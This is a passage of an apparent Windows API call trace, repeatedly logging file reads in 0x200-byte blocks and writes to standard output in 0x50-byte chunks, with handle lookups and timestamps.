| out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.525] GetFileType (hFile=0x4c) returned 0x1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.525] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.525] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.526] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.526] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] GetFileType (hFile=0x4c) returned 0x1 [0139.526] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.526] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.527] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.527] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] GetFileType (hFile=0x4c) returned 0x1 [0139.527] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.527] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.528] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.528] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.528] GetFileType (hFile=0x4c) returned 0x1 [0139.528] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.529] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.529] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.529] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.529] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.530] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.530] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.530] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.530] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.531] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.531] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] GetFileType (hFile=0x4c) returned 0x1 [0139.531] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.531] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f370*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f3c0*, lpNumberOfBytesWritten=0x16e3c4*=0x20, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.532] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e3b0 | out: lpNewFilePointer=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=4) returned 0x54 [0139.532] ReadFile (in: hFile=0x54, lpBuffer=0x16f1e0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e3d0, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesRead=0x16e3d0*=0x200, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f1e0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f230*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f230*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] GetFileType (hFile=0x4c) returned 0x1 [0139.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.532] WriteFile (in: hFile=0x4c, lpBuffer=0x16f280*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f280*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f2d0*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] WriteFile (in: hFile=0x4c, lpBuffer=0x16f320*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e3c4, lpOverlapped=0x0 | out: lpBuffer=0x16f320*, lpNumberOfBytesWritten=0x16e3c4*=0x50, lpOverlapped=0x0) returned 1 [0139.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0139.533] GetFileType (hFile=0x4c) returned 0x1 [0139.533] _get_osfhandle 